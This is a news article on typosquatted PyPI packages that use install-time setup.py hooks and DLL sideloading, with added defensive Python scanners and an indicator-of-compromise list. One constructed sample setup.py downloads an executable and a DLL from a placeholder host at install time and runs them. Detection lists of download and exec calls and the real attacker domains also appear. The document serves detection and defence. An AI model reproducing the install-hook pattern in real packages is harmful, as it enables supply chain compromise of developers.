Tuesday, November 12, 2024

New Malicious PyPI Packages Use DLL Sideloading In A Supply Chain Attack


Researchers have repeatedly observed threat actors using open-source platforms and code for several purposes: hosting C2 infrastructure, storing stolen data, and delivering second- and third-stage downloaders or rootkits.

Two PyPI packages have now been found that run attacker code through DLL sideloading, a technique chosen because it lets the malicious code execute inside a trusted, signed process and so slip past security monitoring tools.

The packages were identified as NP6HelperHttptest and NP6HelperHttper. 


Malicious PyPI Packages

According to the report shared with Cyber Security News, open-source package ecosystems are used by almost every developer, yet they have no reputation provider that assesses the quality and trustworthiness of the code they host.

That makes it comparatively easy for threat actors to publish malicious code into these repositories and mount supply chain attacks.

The report highlights two techniques that are commonly used in such attacks: typosquatting and repojacking.

The two malicious PyPI packages are typosquats: their names closely resemble those of legitimate NP6 packages.

Malware infection stages (Source: Reversing Labs)

Developers who overlook the spelling difference take the package for the legitimate one and pull it into their projects.

Once it is installed, the threat actor has a foothold from which to pivot further into the organization and carry out malicious activity.

Malicious Script Abusing DLL Sideloading

Both malicious packages ship a setup.py that extends a setuptools command so that, at install time, two additional files are downloaded: ComServer.exe and dgdeskband64.dll.

ComServer.exe is a legitimate executable signed with a valid certificate from Beijing-based Kingsoft Corp; dgdeskband64.dll is a malicious library that downloads and runs a second-stage payload.

Setup.py file (Source: Reversing Labs)
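The install-time hook is what makes the package dangerous before any of its code is ever imported. The following is an added example (not the article's or ReversingLabs' code) that statically triages a setup.py with the standard-library ast module, flagging a setuptools command subclass that overrides run(), a custom cmdclass registration, and download/process/DLL-loading primitives. SAMPLE_SETUP_PY is constructed to mirror the pattern described above; it is not the real NP6HelperHttptest setup.py, and its URL is a placeholder.

```python
"""Static triage for install-time hooks in setup.py (added example, not the
article's or ReversingLabs' code). SAMPLE_SETUP_PY is constructed; the URL in
it is a placeholder, not the campaign's real host."""
import ast

HOOKED_COMMANDS = {"install", "develop", "egg_info", "build_py", "bdist_egg"}
NETWORK_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
                 "urlopen", "urlretrieve", "requests.get", "requests.post"}
EXEC_CALLS = {"subprocess.Popen", "subprocess.call", "subprocess.run",
              "os.system", "os.startfile", "os.popen",
              "ctypes.WinDLL", "ctypes.CDLL", "exec", "eval"}


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, '' for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(node.id)
    return ".".join(reversed(parts))


def scan_setup_py(source):
    """Return (kind, line, detail) findings for a setup.py source, ordered by line."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            # A subclass of install/develop/... that overrides run() is executed
            # by pip during installation, before the package is ever imported.
            hooked = {_dotted(b).rsplit(".", 1)[-1] for b in node.bases} & HOOKED_COMMANDS
            overrides_run = any(isinstance(m, ast.FunctionDef) and m.name == "run"
                                for m in node.body)
            if hooked and overrides_run:
                findings.append(("command_hook", node.lineno,
                                 f"class {node.name} overrides run() of {sorted(hooked)}"))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(("cmdclass", node.lineno, "setup() registers a custom cmdclass"))
            elif name in NETWORK_CALLS:
                findings.append(("network", node.lineno, name))
            elif name in EXEC_CALLS:
                findings.append(("exec", node.lineno, name))
    return sorted(findings, key=lambda f: f[1])


# Constructed sample mirroring the campaign's structure (placeholder URL, no payload).
SAMPLE_SETUP_PY = '''
import os
import subprocess
import urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        base = "https://example.invalid/"          # placeholder, not the real host
        drop = os.getenv("TEMP", ".")
        for name in ("ComServer.exe", "dgdeskband64.dll"):
            urllib.request.urlretrieve(base + name, os.path.join(drop, name))
        subprocess.Popen([os.path.join(drop, "ComServer.exe")])

setup(name="NP6HelperHttptest", version="0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign package for comparison: no hooks, no downloads.
BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="np6helper", version="1.0", packages=["np6helper"])
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        print(label, scan_setup_py(src) or "no findings")
```

A single finding is not proof of malice (many legitimate packages register cmdclass hooks), but a command hook combined with a network fetch and a process launch in the same setup.py is exactly the shape worth quarantining before pip runs it; wheels avoid the problem entirely because they carry no setup.py to execute.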

ComServer.exe loads a library named dgdeskband64.dll and calls its exported function DllInstall.

The dgdeskband64.dll shipped inside the package, however, is not the legitimate library that ComServer.exe expects.

Different exports for the legit and malicious dll (Source: Reversing Labs)

The attacker-built dgdeskband64.dll exposes the same DllInstall export under the name of the legitimate library, so ComServer.exe loads and calls it without complaint: a textbook DLL sideloading attack.

Because the malicious code then runs inside a signed, legitimate process, it is far less likely to draw the attention of security tooling.
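One practical check when a DLL turns up next to a signed executable is to compare its export table with the genuine library's: a sideload stand-in typically implements only the one or two exports the loader actually calls. The following is an added example, not ReversingLabs' or the article's tooling, that parses the PE export directory with struct alone (no pefile dependency). Because the real dgdeskband64.dll is not available here, build_fake_dll() fabricates minimal PE32+ images containing nothing but an export table; the export lists used in the demo are constructed and are not the real DLLs' exports.

```python
"""Export-table comparison for DLL sideloading triage (added example, not the
article's or ReversingLabs' code). build_fake_dll() makes constructed PE32+
images with only an export section; they are not loadable DLLs."""
import struct


def export_names(pe):
    """Return the exported function names of a PE image given as bytes."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    nt = struct.unpack_from("<I", pe, 0x3C)[0]            # e_lfanew
    if pe[nt:nt + 4] != b"PE\0\0":
        raise ValueError("bad NT signature")
    nsec = struct.unpack_from("<H", pe, nt + 6)[0]        # FileHeader.NumberOfSections
    opt_size = struct.unpack_from("<H", pe, nt + 20)[0]   # FileHeader.SizeOfOptionalHeader
    opt = nt + 24
    magic = struct.unpack_from("<H", pe, opt)[0]
    data_dir = opt + (112 if magic == 0x20B else 96)      # PE32+ vs PE32 DataDirectory offset
    exp_rva = struct.unpack_from("<I", pe, data_dir)[0]   # entry 0 = export table
    if exp_rva == 0:
        return []
    # Section table entries: (VirtualAddress, SizeOfRawData, PointerToRawData).
    sections = [struct.unpack_from("<III", pe, opt + opt_size + 40 * i + 12) for i in range(nsec)]

    def rva2off(rva):
        for va, raw_size, raw_ptr in sections:
            if va <= rva < va + raw_size:
                return raw_ptr + (rva - va)
        raise ValueError(f"RVA {rva:#x} maps to no section")

    d = rva2off(exp_rva)
    n_names = struct.unpack_from("<I", pe, d + 24)[0]                 # NumberOfNames
    names_tbl = rva2off(struct.unpack_from("<I", pe, d + 32)[0])      # AddressOfNames
    names = []
    for i in range(n_names):
        off = rva2off(struct.unpack_from("<I", pe, names_tbl + 4 * i)[0])
        names.append(pe[off:pe.index(b"\0", off)].decode("ascii", "replace"))
    return names


def compare_exports(expected_pe, suspect_pe):
    """Exports the genuine DLL has but the suspect lacks, and vice versa."""
    exp, sus = set(export_names(expected_pe)), set(export_names(suspect_pe))
    return {"missing": sorted(exp - sus), "extra": sorted(sus - exp), "common": sorted(exp & sus)}


def build_fake_dll(exports, dll_name="fake.dll"):
    """Constructed minimal PE32+ image: one section holding only an export table."""
    sec_va, sec_raw, n = 0x1000, 0x400, len(exports)
    funcs, names, ords, strs = 40, 40 + 4 * n, 40 + 8 * n, 40 + 10 * n
    strings, name_rvas = bytearray(), []
    for e in exports:
        name_rvas.append(sec_va + strs + len(strings))
        strings += e.encode() + b"\0"
    dllname_rva = sec_va + strs + len(strings)
    strings += dll_name.encode() + b"\0"
    blob = struct.pack("<IIHHIIIIIII", 0, 0, 0, 0, dllname_rva, 1, n, n,
                       sec_va + funcs, sec_va + names, sec_va + ords)
    blob += b"".join(struct.pack("<I", 0x2000 + 16 * i) for i in range(n))  # dummy code RVAs
    blob += b"".join(struct.pack("<I", r) for r in name_rvas)
    blob += b"".join(struct.pack("<H", i) for i in range(n))
    blob += bytes(strings)
    opt = bytearray(240)                                   # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<I", opt, 108, 16)                   # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112, sec_va, len(blob))   # export DataDirectory entry
    hdr = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
           + struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, len(opt), 0x2022) + bytes(opt)
           + struct.pack("<8sIIIIIIHHI", b".edata", len(blob), sec_va, len(blob), sec_raw,
                         0, 0, 0, 0, 0x40000040))
    image = bytearray(sec_raw + len(blob))
    image[:len(hdr)] = hdr
    image[sec_raw:] = blob
    return bytes(image)


if __name__ == "__main__":
    # Constructed export lists; the real DLLs' exports are not reproduced in the article.
    legit = build_fake_dll(["DllCanUnloadNow", "DllGetClassObject", "DllInstall",
                            "DllRegisterServer", "DllUnregisterServer"], "dgdeskband64.dll")
    suspect = build_fake_dll(["DllInstall"], "dgdeskband64.dll")
    print(compare_exports(legit, suspect))
```

A large "missing" set with a tiny "common" set is the signature to look for: the stand-in exposes just enough to satisfy the loader's GetProcAddress call. Pair the comparison with an Authenticode check on the DLL, since the legitimate library is normally signed and the sideload copy is not.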

Execution of the malicious code is triggered by registering an exception handler inside the DllInstall export.

A second sample was also found. It does not abuse DriverGenius' ComServer.exe; instead, it pairs a different executable with a target DLL named windowsaccessbridge-64.dll.

The functionality of both samples is the same, and both retrieve the same payload from the same URL as the other PyPI packages.

Indicators Of Compromise

PyPI Packages

package_name        version   SHA1
NP6HelperHttptest   0.1       1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4
NP6HelperHttptest   0.2       dfc8afe5cb7377380908064551c9555719fd28e3
NP6HelperHttptest   0.3       73ece3d738777e791035e9c0c94bf4931baf3e3a
NP6HelperHttptest   0.4       e3a7098e3352fdbb5ff5991e9e10dcf3b43b1b86
NP6HelperHttptest   0.5       575bcc28998ad388c2ad2c2ebc74ba583f5c0065
NP6HelperHttptest   0.6       a1bb4531ce800515afa1357b633c73c27fa305cf
NP6HelperHttper     0.1       a65bce340366f724d444978dcdcd877fa2cacb1c

Additional Indicators:

description                                URI
Domain hosting the malicious DLL           https://fus.rngupdatem[.]buzz
Domain hosting the shellcode payload       Us.archive-ubuntu.top

name                          type         SHA1
dgdeskband.dll                PE/dll       1f9fcf86a56394a7267d85ba76c1256d12e3e76b
windowsaccessbridge-64.dll    PE/dll       84c75536b279a85a5320f058514b884a016bc8c8
an.gif                        shellcode    2dc80f45540d0a3ea33830848fcf529f98ea2f5e
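The indicators above are most useful when they can be swept across developer machines and build images without network access. The following is an added example, not ReversingLabs' or the article's tooling, that hashes files under a root and matches them against the SHA1s listed, flags installed distributions whose normalised name matches a typosquat package, and flags files that merely carry one of the campaign's file names (lower confidence, for manual follow-up). Where the dropped ComServer.exe/DLL pair and the pip dist-info directories live is an assumption (site-packages and a temp folder); build_demo_tree() creates a constructed sample tree with decoy bytes, not real malware, so the script runs offline.

```python
"""Offline IOC sweep for the NP6Helper* campaign (added example, not the
article's or ReversingLabs' tooling). Hashes and names are from the article's
IOC table; the demo tree is constructed with decoy content."""
import hashlib
import pathlib
import re
import tempfile

IOC_SHA1 = {  # SHA1 -> description, from the article's IOC table
    "1f9fcf86a56394a7267d85ba76c1256d12e3e76b": "dgdeskband.dll (malicious DLL)",
    "84c75536b279a85a5320f058514b884a016bc8c8": "windowsaccessbridge-64.dll (malicious DLL)",
    "2dc80f45540d0a3ea33830848fcf529f98ea2f5e": "an.gif (shellcode)",
    "1fc236e94b54d3ddc4b2afb8d44a19abd7cf0dd4": "NP6HelperHttptest 0.1",
    "dfc8afe5cb7377380908064551c9555719fd28e3": "NP6HelperHttptest 0.2",
    "73ece3d738777e791035e9c0c94bf4931baf3e3a": "NP6HelperHttptest 0.3",
    "e3a7098e3352fdbb5ff5991e9e10dcf3b43b1b86": "NP6HelperHttptest 0.4",
    "575bcc28998ad388c2ad2c2ebc74ba583f5c0065": "NP6HelperHttptest 0.5",
    "a1bb4531ce800515afa1357b633c73c27fa305cf": "NP6HelperHttptest 0.6",
    "a65bce340366f724d444978dcdcd877fa2cacb1c": "NP6HelperHttper 0.1",
}
IOC_PACKAGES = {"np6helperhttptest", "np6helperhttper"}   # already in normalised form
IOC_FILENAMES = {"comserver.exe", "dgdeskband64.dll", "dgdeskband.dll",
                 "windowsaccessbridge-64.dll", "an.gif"}
DIST_INFO = re.compile(r"^(?P<name>.+?)-(?P<version>[^-]+)\.(dist-info|egg-info)$", re.I)


def normalise(name):
    """PEP 503 name normalisation: lower-case, runs of -_. collapsed to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def sha1_of(path, chunk=1 << 20):
    h = hashlib.sha1()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, ioc_sha1=IOC_SHA1, ioc_packages=IOC_PACKAGES, ioc_filenames=IOC_FILENAMES):
    """Walk root and return sorted (kind, path, detail) hits.

    kind is 'hash' (exact SHA1 match, high confidence), 'package' (an installed
    distribution with a typosquat name) or 'name' (a file carrying one of the
    campaign's file names; check its signature and exports before acting).
    """
    hits = []
    for p in pathlib.Path(root).rglob("*"):
        if p.is_dir():
            m = DIST_INFO.match(p.name)
            if m and normalise(m.group("name")) in ioc_packages:
                hits.append(("package", str(p), f"{m.group('name')} {m.group('version')}"))
        elif p.is_file():
            digest = sha1_of(p)
            if digest in ioc_sha1:
                hits.append(("hash", str(p), ioc_sha1[digest]))
            elif p.name.lower() in ioc_filenames:
                hits.append(("name", str(p), "file name matches a campaign artefact"))
    return sorted(hits)


def build_demo_tree():
    """Constructed sample tree (decoy bytes, no real malware) for an offline run."""
    root = pathlib.Path(tempfile.mkdtemp(prefix="np6sweep_"))
    (root / "site-packages" / "NP6HelperHttper-0.1.dist-info").mkdir(parents=True)
    (root / "site-packages" / "requests-2.31.0.dist-info").mkdir(parents=True)
    (root / "Temp").mkdir()
    (root / "Temp" / "windowsaccessbridge-64.dll").write_bytes(b"MZ decoy, not the real DLL")
    (root / "Temp" / "notes.txt").write_bytes(b"benign")
    return root


if __name__ == "__main__":
    for hit in sweep(build_demo_tree()):
        print(*hit, sep="\t")
```

On a real host, point sweep() at the interpreter's site-packages, the pip cache (where the downloaded sdist archives, whose SHA1s are the package hashes above, would be found) and the temp directory the install hook wrote to; a 'name' hit on its own means only that the file deserves a signature and export-table check.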


Eswar

Eswar is a cyber security content editor with a passion for creating captivating and informative content. With years of experience in cyber security, he covers cyber security news, technology and other news.
